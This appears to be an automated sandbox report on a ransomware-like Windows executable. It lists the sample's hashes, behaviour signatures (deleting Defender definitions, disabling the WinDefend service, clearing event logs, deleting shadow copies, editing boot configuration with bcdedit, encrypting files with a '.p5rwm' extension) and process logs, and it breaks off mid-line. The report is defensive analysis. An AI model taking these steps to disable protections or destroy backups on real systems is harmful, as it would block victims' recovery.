Analysis
-
max time kernel
40s -
max time network
169s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 16:30
Static task
static1
Behavioral task
behavioral1
Sample
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
Resource
win10-en-20211208
General
-
Target
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe
-
Size
4.2MB
-
MD5
8c005827cf6f2d6b66d3fe8048387dde
-
SHA1
bfdea3bac03c5e5b1748447232db46cfa964a300
-
SHA256
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372
-
SHA512
2dde409e3048fe4f9a9bca1cc3a07546dc2958e7aefc29e3fe45094bbb5510ba28797a301781eb7559fd361463b004085b7cb758c9e420599504b7e54c620fa7
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1116 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 720 bcdedit.exe 2200 bcdedit.exe -
Drops file in Program Files directory 64 IoCs
Processes:
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JAAAACQAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper_1.0.400.v20130327-1442.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_OAAAADgAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DAAAAAwAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\feature.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_MAAAADAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ext_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\feature.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_KgAAACoAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_HAAAABwAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\oledb32r.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msaddsr.dll.mui 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mac.css.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_CgAAAAoAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\7-Zip\Lang\ps.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_zh_CN.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EgAAABIAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ct.sym.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-sendopts.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EAAAABAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\jdwpTransport.h.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_EgAAABIAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-editor-mimelookup-impl.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_LAAAACwAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_ja.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\msdasqlr.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\i640.cab.cat.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NgAAADYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\mc.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BgAAAAYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services_3.4.0.v20140312-2051.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_PgAAAD4AAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jfxswt.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BAAAAAQAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\epl-v10.html.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_NAAAADQAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\System\msadc\es-ES\msaddsr.dll.mui.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Internet Explorer\de-DE\ieinstal.exe.mui 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_BAAAAAQAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_FgAAABYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_JgAAACYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPOlive.png.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-core-output2.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_OAAAADgAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\fr-FR\sqlxmlx.rll.mui 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_de.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.properties.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-io.xml.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\TipTsf.dll.mui 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\keypadbase.xml 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_IAAAACAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_ja_4.4.0.v20140623020002.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_AAAAAAAAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_CgAAAAoAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_DgAAAA4AAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.jobs_3.6.0.v20140424-0053.jar.Ug2p5BdOeOMctrtTPa8P9tKgC9B5G-14-_hAkD0ZyHf_FgAAABYAAAA0.p5rwm 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3788 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exepid process 1780 powershell.exe 1780 powershell.exe 1780 powershell.exe 700 powershell.exe 700 powershell.exe 700 powershell.exe 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3064 wevtutil.exe Token: SeBackupPrivilege 3064 wevtutil.exe Token: SeSecurityPrivilege 1960 wevtutil.exe Token: SeBackupPrivilege 1960 wevtutil.exe Token: SeSecurityPrivilege 4028 wevtutil.exe Token: SeBackupPrivilege 4028 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4064 wmic.exe Token: SeSecurityPrivilege 4064 wmic.exe Token: SeTakeOwnershipPrivilege 4064 wmic.exe Token: SeLoadDriverPrivilege 4064 wmic.exe Token: SeSystemProfilePrivilege 4064 wmic.exe Token: SeSystemtimePrivilege 4064 wmic.exe Token: SeProfSingleProcessPrivilege 4064 wmic.exe Token: SeIncBasePriorityPrivilege 4064 wmic.exe Token: SeCreatePagefilePrivilege 4064 wmic.exe Token: SeBackupPrivilege 4064 wmic.exe Token: SeRestorePrivilege 4064 wmic.exe Token: SeShutdownPrivilege 4064 wmic.exe Token: SeDebugPrivilege 4064 wmic.exe Token: SeSystemEnvironmentPrivilege 4064 wmic.exe Token: SeRemoteShutdownPrivilege 4064 wmic.exe Token: SeUndockPrivilege 4064 wmic.exe Token: SeManageVolumePrivilege 4064 wmic.exe Token: 33 4064 wmic.exe Token: 34 4064 wmic.exe Token: 35 4064 wmic.exe Token: 36 4064 wmic.exe Token: SeIncreaseQuotaPrivilege 1228 wmic.exe Token: SeSecurityPrivilege 1228 wmic.exe Token: SeTakeOwnershipPrivilege 1228 wmic.exe Token: SeLoadDriverPrivilege 1228 wmic.exe Token: SeSystemProfilePrivilege 1228 wmic.exe Token: SeSystemtimePrivilege 1228 wmic.exe Token: SeProfSingleProcessPrivilege 1228 wmic.exe Token: SeIncBasePriorityPrivilege 1228 wmic.exe Token: SeCreatePagefilePrivilege 1228 wmic.exe Token: SeBackupPrivilege 1228 wmic.exe Token: SeRestorePrivilege 1228 wmic.exe Token: SeShutdownPrivilege 1228 wmic.exe Token: SeDebugPrivilege 1228 wmic.exe Token: SeSystemEnvironmentPrivilege 1228 wmic.exe Token: SeRemoteShutdownPrivilege 1228 wmic.exe Token: SeUndockPrivilege 1228 wmic.exe Token: SeManageVolumePrivilege 1228 wmic.exe Token: 33 1228 wmic.exe Token: 34 1228 wmic.exe Token: 35 1228 wmic.exe Token: 36 1228 wmic.exe Token: SeIncreaseQuotaPrivilege 1228 wmic.exe Token: SeSecurityPrivilege 1228 wmic.exe Token: SeTakeOwnershipPrivilege 1228 wmic.exe Token: SeLoadDriverPrivilege 1228 wmic.exe Token: SeSystemProfilePrivilege 1228 wmic.exe Token: SeSystemtimePrivilege 1228 wmic.exe Token: SeProfSingleProcessPrivilege 1228 wmic.exe Token: SeIncBasePriorityPrivilege 1228 wmic.exe Token: SeCreatePagefilePrivilege 1228 wmic.exe Token: SeBackupPrivilege 1228 wmic.exe Token: SeRestorePrivilege 1228 wmic.exe Token: SeShutdownPrivilege 1228 wmic.exe Token: SeDebugPrivilege 1228 wmic.exe Token: SeSystemEnvironmentPrivilege 1228 wmic.exe Token: SeRemoteShutdownPrivilege 1228 wmic.exe Token: SeUndockPrivilege 1228 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3112 wrote to memory of 1344 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3112 wrote to memory of 1344 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 1344 wrote to memory of 3032 1344 net.exe net1.exe PID 1344 wrote to memory of 3032 1344 net.exe net1.exe PID 3112 wrote to memory of 424 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3112 wrote to memory of 424 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 424 wrote to memory of 1524 424 net.exe net1.exe PID 424 wrote to memory of 1524 424 net.exe net1.exe PID 3112 wrote to memory of 2196 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3112 wrote to memory of 2196 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 2196 wrote to memory of 3572 2196 net.exe net1.exe PID 2196 wrote to memory of 3572 2196 net.exe net1.exe PID 3112 wrote to memory of 3052 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3112 wrote to memory of 3052 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3052 wrote to memory of 4064 3052 net.exe net1.exe PID 3052 wrote to memory of 4064 3052 net.exe net1.exe PID 3112 wrote to memory of 3048 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3112 wrote to memory of 3048 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 3048 wrote to memory of 1008 3048 net.exe net1.exe PID 3048 wrote to memory of 1008 3048 net.exe net1.exe PID 3112 wrote to memory of 3240 3112 3489cfa46b9cc21f3fbd73d3225b1f42223a9c14bec10c8d305f72192314a372.exe net.exe PID 